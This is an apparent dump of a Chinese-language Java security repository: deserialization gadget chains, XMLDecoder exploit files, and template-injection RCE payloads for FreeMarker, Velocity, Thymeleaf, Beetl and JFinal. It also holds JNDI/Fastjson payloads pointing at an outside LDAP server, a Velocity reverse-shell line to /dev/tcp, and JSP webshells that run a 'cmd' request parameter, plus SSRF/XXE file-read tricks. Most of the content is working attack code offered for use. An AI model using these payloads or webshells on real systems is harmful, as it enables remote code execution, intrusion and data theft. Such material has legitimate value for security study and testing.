-------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java安全基础/java基础.pdf -------------------------------------------------------------------------------- /java小型框架/img/CVE-2019-9615.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java小型框架/img/CVE-2019-9615.png -------------------------------------------------------------------------------- /java小型框架/img/Readme.md: -------------------------------------------------------------------------------- 1 | # 各个cms的流程图 2 | 3 | 可能不全,太不方便做咯 4 | 
-------------------------------------------------------------------------------- /java小型框架/java代码审计之租车系统.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java小型框架/java代码审计之租车系统.pdf -------------------------------------------------------------------------------- /java小型框架/代码审计基础.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java小型框架/代码审计基础.pdf -------------------------------------------------------------------------------- /java序列化基础/ClassLoader(类加载机制).pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java序列化基础/ClassLoader(类加载机制).pdf -------------------------------------------------------------------------------- /java序列化基础/Java反射机制2.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java序列化基础/Java反射机制2.pdf -------------------------------------------------------------------------------- /java序列化基础/README.md: -------------------------------------------------------------------------------- 1 | # 介绍java反射和java类加载机制 2 | -------------------------------------------------------------------------------- /java序列化基础/java反射机制.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java序列化基础/java反射机制.pdf -------------------------------------------------------------------------------- /java序列化链/Clojure/SerializeUtil.java: -------------------------------------------------------------------------------- 1 | package Tools; 2 | 3 | import java.io.*; 4 | 5 | public class 
SerializeUtil { 6 | 7 | public static void writeObjectToFile(Object obj,String fileName) throws Exception { 8 | ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream(fileName)); 9 | outputStream.writeObject(obj); 10 | outputStream.close(); 11 | } 12 | public static void readFileObject(String fileName) throws Exception { 13 | ObjectInputStream ois = new ObjectInputStream(new FileInputStream(fileName)); 14 | Object o = ois.readObject(); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /java序列化链/CommonsBeanutils/CommonsBeanutils1.java: -------------------------------------------------------------------------------- 1 | package CommonsBeanutils; 2 | 3 | import java.util.PriorityQueue; 4 | import Tools.SerializeUtil; 5 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; 6 | import org.apache.commons.beanutils.BeanComparator; 7 | 8 | public class CommonsBeanutils1 { 9 | public static String fileName = "CommonsBeanutils1.bin"; 10 | public static void main(String[] args) throws Exception { 11 | TemplatesImpl tmpl = SerializeUtil.generateTemplatesImpl(); 12 | //Collections.reverseOrder() 13 | //final BeanComparator comparator = new BeanComparator(null, Collections.reverseOrder()); 14 | final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER); 15 | final PriorityQueue queue = new PriorityQueue(2, comparator); 16 | queue.add("1"); 17 | queue.add("1"); 18 | SerializeUtil.setFieldValue(comparator, "property", "outputProperties"); 19 | SerializeUtil.setFieldValue(queue, "queue", new Object[]{tmpl, tmpl}); 20 | SerializeUtil.writeObjectToFile(queue, fileName); 21 | SerializeUtil.readFileObject(fileName); 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /java序列化链/FileUpload/FileUploadForCopy.java: -------------------------------------------------------------------------------- 1 | package FileUpload; 2 | 3 | 
/** 4 | * author:Firebasky 5 | */ 6 | 7 | import Tools.SerializeUtil; 8 | import org.apache.commons.fileupload.disk.DiskFileItem; 9 | import org.apache.commons.io.output.DeferredFileOutputStream; 10 | import java.io.File; 11 | import java.lang.reflect.Field; 12 | 13 | public class FileUploadForCopy { 14 | public static String fileName = "FileUploadForCopy.bin"; 15 | public static void main(String[] args)throws Exception { 16 | File src = new File("d:/flag.txt"); 17 | File target = new File("d:/bbb"); 18 | DeferredFileOutputStream dfos = new DeferredFileOutputStream(-1, src); 19 | //写入 大于阈值 写入硬盘 20 | DiskFileItem diskFileItem = new DiskFileItem(null, null, false, null, 0, target); 21 | Field dfosFile = DiskFileItem.class.getDeclaredField("dfos"); 22 | dfosFile.setAccessible(true); 23 | dfosFile.set(diskFileItem, dfos); 24 | SerializeUtil.writeObjectToFile(diskFileItem, fileName); 25 | SerializeUtil.readFileObject(fileName); 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /java序列化链/Java反序列化入门之URLDNS链.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java序列化链/Java反序列化入门之URLDNS链.pdf -------------------------------------------------------------------------------- /java序列化链/Mojarra/Readme.md: -------------------------------------------------------------------------------- 1 | # Mojarra 2 | 3 | https://www.synacktiv.com/publications/finding-gadgets-like-its-2015-part-2.html 4 | 5 | https://github.com/synacktiv/mojarragadget 6 | 7 | https://mvnrepository.com/artifact/org.glassfish/javax.faces 8 | 9 | tw上的新链 10 | 11 | ``` 12 | TiedMapEntry.toString() 13 | TiedMapEntry.getValue() 14 | SingletonMap.get() 15 | SingletonMap.isEqualKey() 16 | ValueExpressionValueBindingAdapter.equals() 17 | IndexedValueExpression.getType() 18 | ValueExpressionImpl.getValue() 19 | ``` 20 | 21 | 
![gadgets](https://user-images.githubusercontent.com/63966847/139520715-04f1b40c-b2d4-4702-bc48-572da16254d3.jpg) 22 | -------------------------------------------------------------------------------- /java序列化链/xmldecoder/Readme.md: -------------------------------------------------------------------------------- 1 | # XMLDecoder反序列化漏洞底层 2 | 3 | 参考的文章已经分析的非常详细了,这里我主要是就是一下最后的执行是怎么样的。 4 | 5 | ```java 6 | import java.beans.Expression; 7 | public class test { 8 | public static void main(String[] args)throws Exception { 9 | String[] strings = new String[]{"cmd.exe","/c","calc"}; 10 | Object var3 = new ProcessBuilder(strings); 11 | String var4 = "start"; 12 | Object[] var2 = new Object[]{}; 13 | Expression var5 = new Expression(var3, var4, var2); 14 | var5.getValue(); 15 | } 16 | } 17 | ``` 18 | 19 | 并且通过测试可以发现Expression的使用,给出下面的例子。 20 | 21 | ```java 22 | public class cmd { 23 | public void Noparameter(){ 24 | System.out.println("无参数调用...."); 25 | } 26 | public void Parameter(Object[] obj){ 27 | System.out.println("有参数调用...."); 28 | } 29 | } 30 | ``` 31 | 32 | ```java 33 | import java.beans.Expression; 34 | 35 | public class test1 { 36 | public static void main(String[] args)throws Exception { 37 | Object var3 = new cmd(); 38 | String var4 = "Parameter";//Noparameter 39 | Object[] var2 = new Object[]{"233333"}; 40 | var2 = new Object[]{var2}; 41 | var2 = new Object[]{}; 42 | Expression var5 = new Expression(var3, var4, var2); 43 | var5.getValue(); 44 | } 45 | } 46 | ``` 47 | 48 | 并且给出了一些exp. 
49 | 50 | [exp1](./exp1.xml) 51 | 52 | [exp2](./exp2.xml) **通过实体编码绕过** 53 | 54 | [exp3](./exp3.xml) 55 | 56 | >参考 57 | > 58 | >https://www.freebuf.com/articles/network/247331.html 59 | -------------------------------------------------------------------------------- /java序列化链/xmldecoder/exp1.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | cmd.exe 7 | 8 | 9 | /c 10 | 11 | 12 | calc 13 | 14 | 15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /java序列化链/xmldecoder/exp2.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | cmd.exe 7 | 8 | 9 | /c 10 | 11 | 12 | calc 13 | 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /java序列化链/xmldecoder/exp3.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | D:\shell.jsp 5 | 6 | 7 | 1234567890 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /java序列化链/xmldecoder/main.java: -------------------------------------------------------------------------------- 1 | import java.beans.XMLDecoder; 2 | import java.io.BufferedInputStream; 3 | import java.io.FileInputStream; 4 | 5 | public class main { 6 | public static void main(String[] args) throws Exception{ 7 | XMLDecoder xmlDecoder = new XMLDecoder(new BufferedInputStream(new FileInputStream("XMLEXP.xml"))); 8 | xmlDecoder.readObject(); 9 | xmlDecoder.close(); 10 | } 11 | } -------------------------------------------------------------------------------- /java日常/Thinking_in_java高级之volatile.md: -------------------------------------------------------------------------------- 1 | https://muxiaobai.github.io/2019/10/12/Thinking-in-java-%E9%AB%98%E7%BA%A7%E4%B9%8Bvolatile/ 2 | -------------------------------------------------------------------------------- 
/java日常/img/image-20210818111820181.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java日常/img/image-20210818111820181.png -------------------------------------------------------------------------------- /java日常/img/jep290.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java日常/img/jep290.png -------------------------------------------------------------------------------- /java日常/img/readobject.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java日常/img/readobject.jpg -------------------------------------------------------------------------------- /java日常/img/xxe.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java日常/img/xxe.png -------------------------------------------------------------------------------- /java日常/img/反射.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java日常/img/反射.png -------------------------------------------------------------------------------- /java日常/javabean与内省.md: -------------------------------------------------------------------------------- 1 | https://www.cnblogs.com/uu5666/p/8601983.html 2 | 简单的说安全问题就是可以调用set和get方法 3 | 参考 CB 链 4 | -------------------------------------------------------------------------------- /java日常/java写文件rce.md: -------------------------------------------------------------------------------- 1 | 2 | ## 如果Java项目存在写文件操作怎么rce? 
3 | ### 1.普通的Java web项目 4 | 直接写jsp木马 (如果能解析 5 | 6 | ### 2.如果不能解析jsp 7 | 通过写class文件让其触发某一个方法然后重写该方法rce。也就是把恶意类写入classpath( target/classes),再通过某种方式加载、使用该恶意类,触发该恶意类的static代码块或执行该恶意类的某个方法,来实现通用的RCE利用。重点关注class.formane 8 | 可以参考2021国赛的ezj4va 就是通过重写readobject方法去触发rce。 9 | 或者可以参考d3ctf中的no rce题中也是写入target/classes中实现静态方法。然后通过jdbc去初始化恶意类触发。 10 | 11 | ### 3.如果项目是jar打包启动的 12 | 面前自己遇到的是springboot项目 通过覆盖charset.jar去hook实现rce。大概原理就是jvm启动的过程中不会全部加载资源如charset.jar是不会加载的只有通过特点方法才会加载。这样可以减少Java内存的消耗。 13 | 参考 文章springboot写文件rce 14 | 15 | ### springboot 16 | 17 | https://landgrey.me/blog/22/ 18 | 19 | https://threedr3am.github.io/2021/04/14/JDK8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%9C%BA%E6%99%AF%E4%B8%8B%E7%9A%84SpringBoot%20RCE/ 20 | 21 | ### fastjson 22 | https://threedr3am.github.io/2021/04/13/JDK8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%9C%BA%E6%99%AF%E4%B8%8B%E7%9A%84Fastjson%20RCE/ 23 | 24 | > 25 | https://www.cnblogs.com/wh4am1/p/14681335.html 26 | 27 | https://mp.weixin.qq.com/s?__biz=MzI3MzUwMTQwNg==&mid=2247485312&idx=1&sn=22dddceccf679f34705d987181a328db&token=1393640502&lang=zh_CN&scene=21#wechat_redirect 28 | -------------------------------------------------------------------------------- /java日常/java协议.md: -------------------------------------------------------------------------------- 1 | ## java协议 2 | JAVA默认提供了对file,ftp,gopher,http,https,jar,mailto,netdoc协议的支持。 3 | 4 | ### file(ssrf、xxe): 5 | file:///etc/passwd 6 | 7 | ### netdoc(ssrf、xxe): 8 | 知道文件名和文件路径,很简单我们只要知道文件路径然后利用我们的 netdoc 去列目录就能知道文件名了 9 | netdoc:///var/www/html/ 10 | 不常见 11 | 12 | >ps:过滤了file、gopher可使用netdoc代替 13 | 14 | ### jar(ssrf、xxe): 15 | jar:http://localhost:9999/jar.zip!/1.php 16 | 17 | ### http(ssrf、xxe): 18 | http://url/file.ext 19 | http://example.com/evil.xml 20 | 21 | ### gopher(ssrf、xxe): 22 | gopher://ip:port/xxx 23 | 24 | >监听:nc -vv -l -p port 25 | -------------------------------------------------------------------------------- /java日常/java执行js导致命令执行.pdf: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java日常/java执行js导致命令执行.pdf -------------------------------------------------------------------------------- /java日常/marshalsec.md: -------------------------------------------------------------------------------- 1 | # marshalsec使用 2 | 3 | ``` 4 | java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec. [-a] [-v] [-t] [ []] 5 | ``` 6 | 7 | 参数说明: 8 | 9 | - -a:生成exploit下的所有payload 10 | - -t:对生成的payloads进行解码测试 11 | - -v:verbose mode, 展示生成的payloads 12 | - gadget_type:指定使用的payload 13 | - arguments: payload运行时使用的参数 14 | - marshalsec.:指定exploits,根目录下的java文件名 15 | -------------------------------------------------------------------------------- /java日常/readobject深入.md: -------------------------------------------------------------------------------- 1 | ## 流程: 2 | 3 | ![](./img/readobject.jpg) 4 | ObjectInputSteram.readObject() 5 | 6 | readObject0() 7 | 8 | readOrdinaryObject() 9 | 10 | desc = readClassDesc(false) 11 | 12 | descriptor = readNonProxyDesc(unshared) 13 | 14 | readDesc = readClassDescriptor() 15 | 16 | cl = resolveClass(readDesc) 17 | 18 | filterCheck(cl, -1) 19 | 20 | desc.initNonProxy(readDesc, cl, resolveEx, readClassDesc(false)) 21 | 各種初始化、檢查 suid 等 22 | 23 | return desc 24 | 25 | return descriptor 26 | 27 | obj = desc.isInstantiable() ? 
desc.newInstance() : null 28 | 29 | readSerialData(obj, desc) 30 | 31 | slotDesc.invokeReadObject(obj, this) 32 | 33 | readObjectMethod.invoke(obj, new Object[]{ in }) 34 | -------------------------------------------------------------------------------- /java日常/yso搭建.md: -------------------------------------------------------------------------------- 1 | 参考: 2 | 3 | https://www.guildhab.top/2020/07/java-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E5-%E8%A7%A3%E5%AF%86-ysoserial-java%E5%8A%A8%E6%80%81%E4%BB%A3%E7%90%86%E6%9C%BA%E5%88%B6/ 4 | -------------------------------------------------------------------------------- /java模板注入/Beetl/exp.txt: -------------------------------------------------------------------------------- 1 | http://ibeetl.com/beetlonline/ 2 | 3 | https://landgrey.me/blog/17/ 4 | 5 | JfinalCMS: https://xz.aliyun.com/t/8695 6 | 7 | ```java 8 | ${@java.lang.Class.forName("java.lang.Runtime").getMethod("exec",@java.lang.Class.forName("java.lang.String")).invoke(@java.lang.Class.forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null),"ping 029bzv.dnslog.cn")} 9 | 10 | 11 | ``` 12 | -------------------------------------------------------------------------------- /java模板注入/FreeMarker/exp.txt: -------------------------------------------------------------------------------- 1 | https://www.cnblogs.com/Eleven-Liu/p/12747908.html 2 | 3 | freemarker.template.utility#Execute 4 | <#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")} 5 | 6 | freemarker.template.utility#ObjectConstructor 7 | <#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc.exe").start()} 8 | 9 | freemarker.template.utility#JythonRuntime 10 | <#assign value="freemarker.template.utility.JythonRuntime"?new()><@value>import os;os.system("calc.exe") 11 | 12 | bypass 13 | https://github.com/proudwind/javasec_study/blob/master/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-ssti.md 14 | 
https://paper.seebug.org/1304/ 15 | -------------------------------------------------------------------------------- /java模板注入/Thymeleaf/exp.txt: -------------------------------------------------------------------------------- 1 | https://paper.seebug.org/1332/ 2 | 3 | exp: 4 | 3.0.12 Thymeleaf RCE Bypass 5 | ${T (java.lang.Runtime).getRuntime().exec("whoami")} 6 | 7 | -------------------------------------------------------------------------------- /java模板注入/Velocity/exp.txt: -------------------------------------------------------------------------------- 1 | $bizBean.class.class.forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec("/bin/bash -c bash${IFS}-i${IFS}>&/dev/tcp/VPS-IP/VPS-PORT<&1") 2 | 3 | 4 | #set($e="e") 5 | ${e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc")} 6 | 7 | -------------------------------------------------------------------------------- /java模板注入/Velocity/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | org.apache.velocity 4 | velocity 5 | 1.7 6 | 7 | 8 | org.apache.velocity 9 | velocity-tools 10 | 2.0 11 | 12 | -------------------------------------------------------------------------------- /java模板注入/exp.txt: -------------------------------------------------------------------------------- 1 | https://p1n93r.github.io/post/code_audit/jfinal_enjoy_template_engine%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87%E5%88%86%E6%9E%90/ 2 | 3 | https://www.bookstack.cn/read/jfinal-4.8/09006a00d50c23b5.md 4 | 5 | 6 | #include("../log/jfinal-blog.log") 7 | 8 | #set(script_e=net.sf.ehcache.util.ClassLoaderUtil::createNewInstance("javax.script.ScriptEngineManager"))#set(script_j=script_e.getEngineByName("js"))#set(exp="new java.io.BufferedWriter(new 
java.io.FileWriter('C:\\Users\\ctf\\jfinal-blog\\jfinal-blog\\webapp\\upload\\image\\2.txt::$DATA'));out.write(java.net.URLDecoder.decode('1231321231'));out.close();")#(script_j.eval(exp)) 9 | 10 | 11 | 12 | #set(script_e=net.sf.ehcache.util.ClassLoaderUtil::createNewInstance("javax.script.ScriptEngineManager"))#set(script_j=script_e.getEngineByName("js"))#set(exp="java.lang.Runtime.getRuntime().exec('ping kmvqho.dnslog.cn')")#(script_j.eval(exp)) 13 | 14 | java.lang.Runtime.getRuntime().exec('ping kmvqho.dnslog.cn') 15 | 16 | 17 | #((com.mysql.jdbc.Util::handleNewInstance(((java.net.URLClassLoader::getSystemClassLoader()).loadClass("javax.script.ScriptEngineManager").getDeclaredConstructor()),null,null)).getEngineByExtension("js").eval("java.lang.Runtime.getRuntime().exec('ping kmvqho.dnslog.cn')")) 18 | -------------------------------------------------------------------------------- /java模板注入/jsp/test.jsp: -------------------------------------------------------------------------------- 1 | <% 2 | out.println(22222); 3 | %> 4 | ${Runtime.getRuntime().exec("calc")} 5 | -------------------------------------------------------------------------------- /java面向对象练习一.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java面向对象练习一.pdf -------------------------------------------------------------------------------- /jndi-gadgets.md: -------------------------------------------------------------------------------- 1 | ``` 2 | {"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["ldap://1.116.136.120:1600/TomcatBypass/TomcatEcho"],"Realms":[""],"a":"a"} 3 | 4 | {"object":["com.mchange.v2.c3p0.JndiRefForwardingDataSource",{"jndiName":"rmi://localhost:8088/Exploit", "loginTimeout":0}]} 5 | 6 | InputStream in = new FileInputStream("C3P0.ser"); 7 | byte[] data = toByteArray(in); 8 | in.close(); 9 | String HexString = bytesToHexString(data, 
data.length); 10 | String poc = "{\"object\":[\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",{\"userOverridesAsString\":\"HexAsciiSerializedMap:"+ HexString + ";\"}]}"; 11 | System.out.println(poc); 12 | 13 | public static byte[] toByteArray(InputStream in) throws IOException { 14 | byte[] classBytes; 15 | classBytes = new byte[in.available()]; 16 | in.read(classBytes); 17 | in.close(); 18 | return classBytes; 19 | } 20 | 21 | public static String bytesToHexString(byte[] bArray, int length) { 22 | StringBuffer sb = new StringBuffer(length); 23 | for(int i = 0; i < length; ++i) { 24 | String sTemp = Integer.toHexString(255 & bArray[i]); 25 | if (sTemp.length() < 2) { 26 | sb.append(0); 27 | } 28 | 29 | sb.append(sTemp.toUpperCase()); 30 | } 31 | return sb.toString(); 32 | } 33 | ``` 34 | -------------------------------------------------------------------------------- /shell/EL/test.java: -------------------------------------------------------------------------------- 1 | package shell.EL; 2 | 3 | import javax.el.ELProcessor; 4 | 5 | public class test { 6 | public static void main(String[] args) throws Exception { 7 | String payload = "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval(\"var exp='calc';java.lang.Runtime.getRuntime().exec(exp);\")"; 8 | 9 | String poc = "''.getClass().forName('javax.script.ScriptEngineManager')" + 10 | ".newInstance().getEngineByName('nashorn')" + 11 | ".eval(\"s=[3];s[0]='cmd.exe';s[1]='/c';s[2]='calc';java.lang.Runtime.getRuntime().exec(s);\")"; 12 | 13 | ELeval(payload); 14 | } 15 | 16 | public static void ELeval(String payload){ 17 | ELProcessor elProcessor = new ELProcessor(); 18 | try { 19 | elProcessor.eval(payload); 20 | } catch (Exception e) { 21 | e.printStackTrace(); 22 | } 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /shell/Elasticsearch_MVEL/demo.java: 
-------------------------------------------------------------------------------- 1 | String exp = "a=123;new java.lang.ProcessBuilder("calc").start();"; 2 | Map vars = new HashMap(); 3 | vars.put("foobar", new Integer(100)); 4 | String result = MVEL.eval(exp, vars).toString(); 5 | -------------------------------------------------------------------------------- /shell/Elasticsearch_MVEL/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | org.mvel 3 | mvel2 4 | 2.2.8.Final 5 | 6 | -------------------------------------------------------------------------------- /shell/Expression/test.java: -------------------------------------------------------------------------------- 1 | package shell.Expression; 2 | 3 | import java.beans.Expression; 4 | 5 | public class test { 6 | public static void main(String[] args) { 7 | String payload ="calc"; 8 | Expression expression = new Expression(Runtime.getRuntime(),"\u0065"+"\u0078"+"\u0065"+"\u0063",new Object[]{payload}); 9 | try { 10 | expression.getValue(); 11 | } catch (Exception e) { 12 | e.printStackTrace(); 13 | } 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /shell/Expression/test.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.beans.Expression"%> 2 | <%@ page contentType="text/html; charset=UTF-8" language="java" %> 3 | <% 4 | String payload =request.getParameter("cmd"); 5 | Expression expression = new Expression(Runtime.getRuntime(),"\u0065"+"\u0078"+"\u0065"+"\u0063",new Object[]{payload}); 6 | %> -------------------------------------------------------------------------------- /shell/JNDI/test.java: -------------------------------------------------------------------------------- 1 | package shell.JNDI; 2 | 3 | import com.sun.rowset.JdbcRowSetImpl; 4 | 5 | public class test { 6 | public static void main(String[] args) { 7 | String payload = 
"ldap://1.116.136.120:8888/test";//可使用LdapBypassJndi工具 8 | // String payload = "ldap://127.0.0.1:1399/test"; 9 | try { 10 | Jndieval(payload); 11 | } catch (Exception e) { 12 | e.printStackTrace(); 13 | } 14 | } 15 | public static void Jndieval(String payload) throws Exception{ 16 | // System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true");//绕过jdk191+ 17 | JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl(); 18 | jdbcRowSet.setDataSourceName(payload);//设置exp,通过getDataSourceName获得 19 | jdbcRowSet.setAutoCommit(true);//调用connect() 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /shell/JNI/CommandExecution.java: -------------------------------------------------------------------------------- 1 | package shell.JNI; 2 | 3 | public class CommandExecution { 4 | 5 | // public static native String exec(String cmd); 6 | 7 | public static void main(String[] args) { 8 | System.setProperty("java.library.path","D:/library"); 9 | System.out.println(System.getProperty("java.library.path")); 10 | } 11 | } -------------------------------------------------------------------------------- /shell/JNI/test.jsp: -------------------------------------------------------------------------------- 1 | <%@ page contentType="text/html; charset=UTF-8" language="java" %> 2 | <%! 
class Jni{ 3 | static { 4 | System.loadLibrary("\\\\127.0.0.1\\cmd.dll"); 5 | } 6 | public native String exec(String cmd); 7 | } 8 | %><% 9 | String cmd =request.getParameter("cmd"); 10 | Jni jni = new Jni(); 11 | String res = jni.exec(cmd); 12 | out.println(res); 13 | %> -------------------------------------------------------------------------------- /shell/Jexl/demo.java: -------------------------------------------------------------------------------- 1 | JexlContext jc = new MapContext(); 2 | Expression e = new JexlEngine().createExpression("''.class.forName('java.lang.Runtime').getRuntime().exec("calc")"); 3 | Object result = e.evaluate(jc); 4 | System.out.println(result); 5 | -------------------------------------------------------------------------------- /shell/Jexl/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | org.apache.commons 3 | commons-jexl 4 | 2.1.1 5 | 6 | -------------------------------------------------------------------------------- /shell/Jshell/test.java: -------------------------------------------------------------------------------- 1 | //package shell.Jshell; 2 | //import jdk.jshell.JShell; 3 | // 4 | //public class test { 5 | // public static void main(String[] args) { 6 | // Jshell("calc"); 7 | // } 8 | // public static void Jshell(String cmd){ 9 | // try { 10 | // JShell.builder().build().eval(cmd); 11 | // } catch (IllegalStateException e) { 12 | // e.printStackTrace(); 13 | // } 14 | // } 15 | //} 16 | -------------------------------------------------------------------------------- /shell/OGNL/demo.java: -------------------------------------------------------------------------------- 1 | OgnlContext context = new OgnlContext(); 2 | Object execResult = Ognl.getValue("@java.lang.Runtime@getRuntime().exec('calc')", null); 3 | System.out.println(execResult); 4 | -------------------------------------------------------------------------------- /shell/OGNL/pom.xml: 
-------------------------------------------------------------------------------- 1 | 2 | ognl 3 | ognl 4 | 3.0.1 5 | 6 | -------------------------------------------------------------------------------- /shell/Readme.md: -------------------------------------------------------------------------------- 1 | # shell 2 | 3 | 偶然发现了一篇文章 4 | >https://xz.aliyun.com/t/7798 5 | 6 | 7 | + [一种新型Java一句话木马的实现](https://xz.aliyun.com/t/9715) 8 | 9 | ## 命令执行的tips 10 | 11 | https://www.anquanke.com/post/id/243329 12 | 13 | https://xz.aliyun.com/t/7046 14 | 15 | **其实说到底,java.lang.Runtime#exec(String) 会先按空格切分命令(导致切分结果不符合本意),而 exec(String[]) 的参数由调用者自行分离,因此可以执行** 16 | 17 | 下面代码是可以执行的 18 | 19 | /cmd?command=;curl http://ip:port 20 | 21 | ```java 22 | @GetMapping(value = "/cmd") 23 | public void cmd(@RequestParam String command) throws Exception { 24 | String[] c = { "/bin/bash","-c", "hacker "+ command };///bin/bash -c hacker;ls 25 | Process p = Runtime.getRuntime().exec(c); 26 | } 27 | ``` 28 | 29 | 下面是不能执行的 30 | ```java 31 | Command = "ping 127.0.0.1"+request.getParameter("cmd"); 32 | Runtime.getRuntime().exec(command); 33 | ``` 34 | -------------------------------------------------------------------------------- /shell/ScriptEngineManager/java-scripting-programmers-guide.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/shell/ScriptEngineManager/java-scripting-programmers-guide.pdf -------------------------------------------------------------------------------- /shell/ScriptEngineManager/shell.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*,java.beans.*,java.lang.*,javax.script.*"%> 2 | <% 3 | ScriptEngineManager scriptEngineManager = new ScriptEngineManager(); 4 | BufferedReader object = (BufferedReader)scriptEngineManager.getEngineByName("JavaScript").eval("new 
java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cmd.exe /c "+request.getParameter("cmd")+"").getInputStream()))"); 5 | 6 | String line = ""; 7 | String result = ""; 8 | while((line=object.readLine())!=null) 9 | { 10 | result = result + line; 11 | } 12 | out.println(result); 13 | %> 14 | -------------------------------------------------------------------------------- /shell/ScriptEngineManager/shell2.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*,java.beans.*,java.lang.*,javax.script.*"%> 2 | <% 3 | ScriptEngineManager manager = new ScriptEngineManager(); 4 | ScriptEngine engine = manager.getEngineByName("JavaScript"); 5 | 6 | Compilable compEngine = (Compilable) engine; 7 | CompiledScript script = compEngine.compile("new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cmd.exe /c dir").getInputStream()))"); 8 | BufferedReader object = (BufferedReader)script.eval(); 9 | 10 | String line = ""; 11 | String result = ""; 12 | while((line=object.readLine())!=null) 13 | { 14 | result = result + line; 15 | } 16 | out.println(result); 17 | %> 18 | -------------------------------------------------------------------------------- /shell/bypass/servertableentry.java: -------------------------------------------------------------------------------- 1 | package shell.bypass; 2 | 3 | import com.sun.corba.se.impl.logging.ActivationSystemException; 4 | import com.sun.corba.se.spi.activation.RepositoryPackage.ServerDef; 5 | import java.lang.reflect.Constructor; 6 | import java.lang.reflect.Field; 7 | import java.lang.reflect.Method; 8 | import java.util.logging.Logger; 9 | 10 | public class servertableentry { 11 | public static void main(String[] args) throws Exception{ 12 | Class C = Class.forName("com.sun.corba.se.impl.activation.ServerTableEntry"); 13 | Constructor declaredConstructor = 
